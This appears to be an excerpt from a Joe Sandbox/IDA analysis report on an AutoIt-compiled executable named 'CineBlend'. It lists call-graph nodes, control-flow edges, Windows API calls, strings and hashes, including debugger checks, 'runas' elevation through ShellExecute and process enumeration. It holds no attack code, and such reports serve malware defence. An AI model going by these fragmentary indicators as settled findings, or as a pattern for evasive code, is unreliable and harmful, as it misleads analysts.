105792->105777 105796 b6ec51 105793->105796 105795 b4686d 105795->105700 105797 b6ec5d ___scrt_is_nonwritable_in_current_image 105796->105797 105798 b6ec70 ___scrt_fastfail 105797->105798 105799 b6ec9d 105797->105799 105800 b6ec95 __wsopen_s 105797->105800 105823 b6f649 20 API calls __dosmaperr 105798->105823 105809 b694fd EnterCriticalSection 105799->105809 105800->105795 105803 b6eca7 105810 b6ea68 105803->105810 105805 b6ec8a 105824 b72b5c 26 API calls ___std_exception_copy 105805->105824 105809->105803 105813 b6ea7a ___scrt_fastfail 105810->105813 105816 b6ea97 105810->105816 105811 b6ea87 105826 b6f649 20 API calls __dosmaperr 105811->105826 105813->105811 105813->105816 105818 b6eada __fread_nolock 105813->105818 105814 b6ea8c 105827 b72b5c 26 API calls ___std_exception_copy 105814->105827 105825 b6ecdc LeaveCriticalSection __fread_nolock 105816->105825 105817 b6ebf6 ___scrt_fastfail 105829 b6f649 20 API calls __dosmaperr 105817->105829 105818->105816 105818->105817 105820 b6dcc5 __fread_nolock 26 API calls 105818->105820 105822 b790c5 __fread_nolock 38 API calls 105818->105822 105828 b6d2e8 26 API calls 4 library calls 105818->105828 105820->105818 105822->105818 105823->105805 105824->105800 105825->105800 105826->105814 105827->105816 105828->105818 105829->105814 105833 b6e858 105830->105833 105832 bb311c 105832->105702 105836 b6e7d9 105833->105836 105835 b6e875 105835->105832 105837 b6e7fc 105836->105837 105838 b6e7e8 105836->105838 105843 b6e7f8 __alldvrm 105837->105843 105846 b736b2 11 API calls 2 library calls 105837->105846 105844 b6f649 20 API calls __dosmaperr 105838->105844 105840 b6e7ed 105845 b72b5c 26 API calls ___std_exception_copy 105840->105845 105843->105835 105844->105840 105845->105843 105846->105843 105848 b822d0 __wsopen_s 105847->105848 105849 b43af6 GetCurrentDirectoryW 105848->105849 105850 b48577 22 API calls 105849->105850 105851 b43b19 105850->105851 105851->105528 105883 b4b120 105852->105883 105855 b46d47 105860 b46d5e 105855->105860 105856 b46de5 SetFilePointerEx SetFilePointerEx 105858 b43c5e 105856->105858 105857 b8592a SetFilePointerEx 105858->105545 105858->105546 105859 b85919 105859->105857 105860->105856 105860->105857 105860->105858 105860->105859 105861->105531 105862->105542 105863->105515 105873->105515 105874->105525 105882->105537 105884 b4b19b 105883->105884 105887 b4b12e 105883->105887 105890 b5f18b SetFilePointerEx 105884->105890 105885 b43b2d 105885->105855 105887->105885 105888 b4b16c ReadFile 105887->105888 105888->105885 105889 b4b186 105888->105889 105889->105885 105889->105887 105890->105887 105894 bb383b 105891->105894 105892 bb32bd 27 API calls 105892->105894 105893 bb36fc 105893->105614 105893->105632 105894->105892 105894->105893 105895 b4684a 40 API calls 105894->105895 105896 b46874 64 API calls 105894->105896 105895->105894 105896->105894 105898 bb2c98 105897->105898 105899 bb2ca6 105897->105899 105900 b6e95b 29 API calls 105898->105900 105901 bb2ceb 105899->105901 105902 b6e95b 29 API calls 105899->105902 105912 bb2caf 105899->105912 105900->105899 105926 bb2f16 40 API calls __fread_nolock 105901->105926 105903 bb2cd0 105902->105903 105903->105901 105905 bb2cd9 105903->105905 105905->105912 105934 b6e9e8 105905->105934 105906 bb2d2f 105907 bb2d33 105906->105907 105908 bb2d54 105906->105908 105912->105632 105926->105906 106019->105384 106021 b64f4b _abort 106020->106021 106022 b64f64 106021->106022 106023 b64f52 106021->106023 106044 b732d1 EnterCriticalSection 106022->106044 106059 b65099 GetModuleHandleW 106023->106059 106026 b64f57 106026->106022 106060 b650dd GetModuleHandleExW 106026->106060 106030 b64fe0 106032 b64ff8 106030->106032 106036 b72791 _abort 5 API calls 106030->106036 106037 b72791 _abort 5 API calls 106032->106037 106033 b65026 106051 b65058 106033->106051 106034 b65052 106068 b820a9 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 106034->106068 106036->106032 106042 b65009 106037->106042 106038 b64f6b 106038->106030 106038->106042 106045 b72518 106038->106045 106048 b65049 106042->106048 106044->106038 106069 b72251 106045->106069 106088 b73319 LeaveCriticalSection 106048->106088 106050 b65022 106050->106033 106050->106034 106089 b7397f 106051->106089 106054 b65086 106057 b650dd _abort 8 API calls 106054->106057 106055 b65066 GetPEB 106055->106054 106056 b65076 GetCurrentProcess TerminateProcess 106055->106056 106056->106054 106058 b6508e ExitProcess 106057->106058 106059->106026 106061 b65107 GetProcAddress 106060->106061 106062 b6512a 106060->106062 106063 b6511c 106061->106063 106064 b65130 FreeLibrary 106062->106064 106065 b65139 106062->106065 106063->106062 106064->106065 106066 b60dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 106065->106066 106067 b64f63 106066->106067 106067->106022 106072 b72200 106069->106072 106071 b72275 106071->106030 106073 b7220c ___scrt_is_nonwritable_in_current_image 106072->106073 106080 b732d1 EnterCriticalSection 106073->106080 106075 b7221a 106081 b722a1 106075->106081 106079 b72238 __wsopen_s 106079->106071 106080->106075 106082 b722c1 106081->106082 106085 b722c9 106081->106085 106083 b60dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 106082->106083 106084 b72227 106083->106084 106087 b72245 LeaveCriticalSection _abort 106084->106087 106085->106082 106086 b72d38 _free 20 API calls 106085->106086 106086->106082 106087->106079 106088->106050 106090 b739a4 106089->106090 106091 b7399a 106089->106091 106096 b7334a 5 API calls 2 library calls 106090->106096 106093 b60dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 106091->106093 106094 b65062 106093->106094 106094->106054 106094->106055 106095 b739bb 106095->106091 106096->106095

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 234 b45fc8-b46037 call b4bf73 GetVersionExW call b48577 239 b8507d-b85090 234->239 240 b4603d 234->240 242 b85091-b85095 239->242 241 b4603f-b46041 240->241 243 b46047-b460a6 call b4adf4 call b455dc 241->243 244 b850bc 241->244 245 b85098-b850a4 242->245 246 b85097 242->246 259 b460ac-b460ae 243->259 260 b85224-b8522b 243->260 249 b850c3-b850cf 244->249 245->242 248 b850a6-b850a8 245->248 246->245 248->241 251 b850ae-b850b5 248->251 253 b4611c-b46136 GetCurrentProcess IsWow64Process 249->253 251->239 252 b850b7 251->252 252->244 255 b46195-b4619b 253->255 256 b46138 253->256 258 b4613e-b4614a 255->258 256->258 261 b85269-b8526d GetSystemInfo 258->261 262 b46150-b4615f LoadLibraryA 258->262 265 b460b4-b460b7 259->265 266 b85125-b85138 259->266 263 b8524b-b8524e 260->263 264 b8522d 260->264 269 b46161-b4616f GetProcAddress 262->269 270 b4619d-b461a7 GetSystemInfo 262->270 267 b85239-b85241 263->267 268 b85250-b8525f 263->268 274 b85233 264->274 265->253 271 b460b9-b460f5 265->271 272 b8513a-b85143 266->272 273 b85161-b85163 266->273 267->263 268->274 275 b85261-b85267 268->275 269->270 276 b46171-b46175 GetNativeSystemInfo 269->276 277 b46177-b46179 270->277 271->253 278 b460f7-b460fa 271->278 279 b85150-b8515c 272->279 280 b85145-b8514b 272->280 281 b85198-b8519b 273->281 282 b85165-b8517a 273->282 274->267 275->267 276->277 287 b46182-b46194 277->287 288 b4617b-b4617c FreeLibrary 277->288 289 b46100-b4610a 278->289 290 b850d4-b850e4 278->290 279->253 280->253 285 b8519d-b851b8 281->285 286 b851d6-b851d9 281->286 283 b8517c-b85182 282->283 284 b85187-b85193 282->284 283->253 284->253 291 b851ba-b851c0 285->291 292 b851c5-b851d1 285->292 286->253 293 b851df-b85206 286->293 288->287 289->249 296 b46110-b46116 289->296 294 b850e6-b850f2 290->294 295 b850f7-b85101 290->295 291->253 292->253 297 b85208-b8520e 293->297 298 b85213-b8521f 293->298 294->253 299 b85103-b8510f 295->299 300 b85114-b85120 295->300 296->253 297->253 298->253 299->253 300->253
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 00B45FF7
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                          • GetCurrentProcess.KERNEL32(?,00BDDC2C,00000000,?,?), ref: 00B46123
                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00B4612A
                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00B46155
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B46167
                                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00B46175
                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00B4617C
                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 00B461A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                          • API String ID: 3290436268-3101561225
                                          • Opcode ID: 3fff9e90d93e477a39aba9c1f86bb2f825f509a4441e382e78b7c6486b2f0413
                                          • Instruction ID: e9a41da10b48f0acddbc158ecaa40a8af04d404a92e9248363ceb55f0d80c7a1
                                          • Opcode Fuzzy Hash: 3fff9e90d93e477a39aba9c1f86bb2f825f509a4441e382e78b7c6486b2f0413
                                          • Instruction Fuzzy Hash: 96A1966984A2C4CFC715DB687C453ED7FDCBB27300B88D4DAD4A0A3232D6294568DB32

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00B43368,?), ref: 00B433BB
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00B43368,?), ref: 00B433CE
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C12418,00C12400,?,?,?,?,?,?,00B43368,?), ref: 00B4343A
                                            • Part of subcall function 00B48577: _wcslen.LIBCMT ref: 00B4858A
                                            • Part of subcall function 00B4425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00B43462,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B442A0
                                          • SetCurrentDirectoryW.KERNEL32(?,00000001,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B434BB
                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00B83CB0
                                          • SetCurrentDirectoryW.KERNEL32(?,00C12418,?,?,?,?,?,?,?,00B43368,?), ref: 00B83CF1
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C031F4,00C12418,?,?,?,?,?,?,?,00B43368), ref: 00B83D7A
                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 00B83D81
                                            • Part of subcall function 00B434D3: GetSysColorBrush.USER32(0000000F), ref: 00B434DE
                                            • Part of subcall function 00B434D3: LoadCursorW.USER32(00000000,00007F00), ref: 00B434ED
                                            • Part of subcall function 00B434D3: LoadIconW.USER32(00000063), ref: 00B43503
                                            • Part of subcall function 00B434D3: LoadIconW.USER32(000000A4), ref: 00B43515
                                            • Part of subcall function 00B434D3: LoadIconW.USER32(000000A2), ref: 00B43527
                                            • Part of subcall function 00B434D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B4353F
                                            • Part of subcall function 00B434D3: RegisterClassExW.USER32(?), ref: 00B43590
                                            • Part of subcall function 00B435B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B435E1
                                            • Part of subcall function 00B435B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B43602
                                            • Part of subcall function 00B435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B43616
                                            • Part of subcall function 00B435B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00B43368,?), ref: 00B4361F
                                            • Part of subcall function 00B4396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00B43A3C
                                          Strings
                                          • AutoIt, xrefs: 00B83CA5
                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00B83CAA
                                          • runas, xrefs: 00B83D75
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                          • API String ID: 683915450-2030392706
                                          • Opcode ID: e7139af6d248eeb25a735a6b3813409fbdd4e127425d910e9fd5f30167ad1ed8
                                          • Instruction ID: 72ee5658b98907b4fadfaf072cf447732cdb8d77133fb89fc134b47ce6bcfa85
                                          • Opcode Fuzzy Hash: e7139af6d248eeb25a735a6b3813409fbdd4e127425d910e9fd5f30167ad1ed8
                                          • Instruction Fuzzy Hash: 8751F570148340AAD701FF60DC51EEEBBF8EF96B04F0444A9F191521B2DB248B99EB22
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00BADDAC
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00BADDBA
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00BADDDA
                                          • CloseHandle.KERNELBASE(00000000), ref: 00BADE87
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 7a9d406cc754ca693bdd9a810f88c36db7f9da25813c78d5cb797ef7b9089462
                                          • Instruction ID: f9a2d9d5aa64414577b8ce87dff538a08421b70cb76e8f563eb60278de51c486
                                          • Opcode Fuzzy Hash: 7a9d406cc754ca693bdd9a810f88c36db7f9da25813c78d5cb797ef7b9089462
                                          • Instruction Fuzzy Hash: F93181711083019FD710EF60C885AAFBBE8EF95350F0409ADF586871A1EB71DA49CB92
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000003,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002,00000000,?,00B72C59,00000003), ref: 00B65079
                                          • TerminateProcess.KERNEL32(00000000,?,00B6502E,00000003,00C098D8,0000000C,00B65185,00000003,00000002,00000000,?,00B72C59,00000003), ref: 00B65080
                                          • ExitProcess.KERNEL32 ref: 00B65092
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 5d46f7ed7ee81d7d84696f7fc30bf54374281c5f6380c9dadee6500fa0146af0
                                          • Instruction ID: 7661ff90e312ba3327671da8ddd095061a97c542aa781c0a3e85b0171a6a5a73
                                          • Opcode Fuzzy Hash: 5d46f7ed7ee81d7d84696f7fc30bf54374281c5f6380c9dadee6500fa0146af0
                                          • Instruction Fuzzy Hash: 3EE04631002508AFCF216F54CD08E887BA9EB10391F004054F8899B121EB39DD52CAC0
                                          APIs
                                          • GetInputState.USER32 ref: 00B4EF07
                                          • timeGetTime.WINMM ref: 00B4F107
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B4F228
                                          • TranslateMessage.USER32(?), ref: 00B4F27B
                                          • DispatchMessageW.USER32(?), ref: 00B4F289
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B4F29F
                                          • Sleep.KERNEL32(0000000A), ref: 00B4F2B1
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                          • String ID:
                                          • API String ID: 2189390790-0
                                          • Opcode ID: dbe083418ab04bc36ddb32f910a3f361c51ebbdf2b94648a50f23c551a5d98fb
                                          • Instruction ID: cb926f3fbcb9c3791549b7af4fea6e7a838f1c0e528a75acecbbf58e4026076e
                                          • Opcode Fuzzy Hash: dbe083418ab04bc36ddb32f910a3f361c51ebbdf2b94648a50f23c551a5d98fb
                                          • Instruction Fuzzy Hash: 2432D230604242EFEB28CF24C884FBABBE5FF81304F1445AAF56597291D771EA45DB92

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00B43657
                                          • RegisterClassExW.USER32(00000030), ref: 00B43681
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B43692
                                          • InitCommonControlsEx.COMCTL32(?), ref: 00B436AF
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B436BF
                                          • LoadIconW.USER32(000000A9), ref: 00B436D5
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B436E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 5c9215f6575ecd77ad305fa2f75a72305ff8290a35d2e8f2e982443ff9c53364
                                          • Instruction ID: 14677a05e34248b08be9d5b6e6cab058ae21f981e57a5b9ce547aaed94d7c1b1
                                          • Opcode Fuzzy Hash: 5c9215f6575ecd77ad305fa2f75a72305ff8290a35d2e8f2e982443ff9c53364
                                          • Instruction Fuzzy Hash: FD21E5B5D02208AFDB00DFA8EC89BDDBBB8FB09710F00811AF651A72A0E7B445508F90

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 366 b809db-b80a0b call b807af 369 b80a0d-b80a18 call b6f636 366->369 370 b80a26-b80a32 call b75594 366->370 377 b80a1a-b80a21 call b6f649 369->377 375 b80a4b-b80a94 call b8071a 370->375 376 b80a34-b80a49 call b6f636 call b6f649 370->376 385 b80b01-b80b0a GetFileType 375->385 386 b80a96-b80a9f 375->386 376->377 387 b80cfd-b80d03 377->387 388 b80b0c-b80b3d GetLastError call b6f613 CloseHandle 385->388 389 b80b53-b80b56 385->389 391 b80aa1-b80aa5 386->391 392 b80ad6-b80afc GetLastError call b6f613 386->392 388->377 403 b80b43-b80b4e call b6f649 388->403 395 b80b58-b80b5d 389->395 396 b80b5f-b80b65 389->396 391->392 397 b80aa7-b80ad4 call b8071a 391->397 392->377 400 b80b69-b80bb7 call b754dd 395->400 396->400 401 b80b67 396->401 397->385 397->392 408 b80bb9-b80bc5 call b8092b 400->408 409 b80bc7-b80beb call b804cd 400->409 401->400 403->377 408->409 415 b80bef-b80bf9 call b78a2e 408->415 416 b80bed 409->416 417 b80bfe-b80c41 409->417 415->387 416->415 419 b80c62-b80c70 417->419 420 b80c43-b80c47 417->420 423 b80cfb 419->423 424 b80c76-b80c7a 419->424 420->419 422 b80c49-b80c5d 420->422 422->419 423->387 424->423 425 b80c7c-b80caf CloseHandle call b8071a 424->425 428 b80cb1-b80cdd GetLastError call b6f613 call b756a6 425->428 429 b80ce3-b80cf7 425->429 428->429 429->423
                                          APIs
                                            • Part of subcall function 00B8071A: CreateFileW.KERNELBASE(00000000,00000000,?,00B80A84,?,?,00000000,?,00B80A84,00000000,0000000C), ref: 00B80737
                                          • GetLastError.KERNEL32 ref: 00B80AEF
                                          • __dosmaperr.LIBCMT ref: 00B80AF6
                                          • GetFileType.KERNELBASE(00000000), ref: 00B80B02
                                          • GetLastError.KERNEL32 ref: 00B80B0C
                                          • __dosmaperr.LIBCMT ref: 00B80B15
                                          • CloseHandle.KERNEL32(00000000), ref: 00B80B35
                                          • CloseHandle.KERNEL32(?), ref: 00B80C7F
                                          • GetLastError.KERNEL32 ref: 00B80CB1
                                          • __dosmaperr.LIBCMT ref: 00B80CB8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: 647f954d03d489c4a8dbeb223deb11fad76cb5c3620d93b24a79cf89992db0d9
                                          • Instruction ID: 170050ea7c270d25550c92942e44f0a6abbdc69b6213bb3d288df4ed72004d5f
                                          • Opcode Fuzzy Hash: 647f954d03d489c4a8dbeb223deb11fad76cb5c3620d93b24a79cf89992db0d9
                                          • Instruction Fuzzy Hash: 81A12632A241098FDF19FF68D892BAD7BE0EB06324F144199F811DB2E1DB359D16CB51

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00B45594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00B84B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00B455B2
                                            • Part of subcall function 00B45238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B4525A
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B453C4
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B84BFD
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B84C3E
                                          • RegCloseKey.ADVAPI32(?), ref: 00B84C80
                                          • _wcslen.LIBCMT ref: 00B84CE7
                                          • _wcslen.LIBCMT ref: 00B84CF6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd
                                          Similarity
                                          • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 98802146-2727554177
                                          • Opcode ID: 283fe5dffd3fc1c65068ebcf2726e92ed8190c9200276a12941acd184e42064b
                                          • Instruction ID: 0e4bd1a87e15c9d4a5c725e0d9823f7bb361c2d35b56eb88247477b129c7aa4c
                                          • Opcode Fuzzy Hash: 283fe5dffd3fc1c65068ebcf2726e92ed8190c9200276a12941acd184e42064b
                                          • Instruction Fuzzy Hash: 2D71AD715053419BC704EF25DC81AAEBBE8FF9A344F8044AEF191932B0EB71DA49CB56

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00B434DE
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00B434ED
                                          • LoadIconW.USER32(00000063), ref: 00B43503
                                          • LoadIconW.USER32(000000A4), ref: 00B43515
                                          • LoadIconW.USER32(000000A2), ref: 00B43527
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B4353F
                                          • RegisterClassExW.USER32(?), ref: 00B43590
                                            • Part of subcall function 00B43624: GetSysColorBrush.USER32(0000000F), ref: 00B43657
                                            • Part of subcall function 00B43624: RegisterClassExW.USER32(00000030), ref: 00B43681
                                            • Part of subcall function 00B43624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00B43692
                                            • Part of subcall function 00B43624: InitCommonControlsEx.COMCTL32(?), ref: 00B436AF
                                            • Part of subcall function 00B43624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00B436BF
                                            • Part of subcall function 00B43624: LoadIconW.USER32(000000A9), ref: 00B436D5
                                            • Part of subcall function 00B43624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00B436E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true
                                          • Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                          • Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
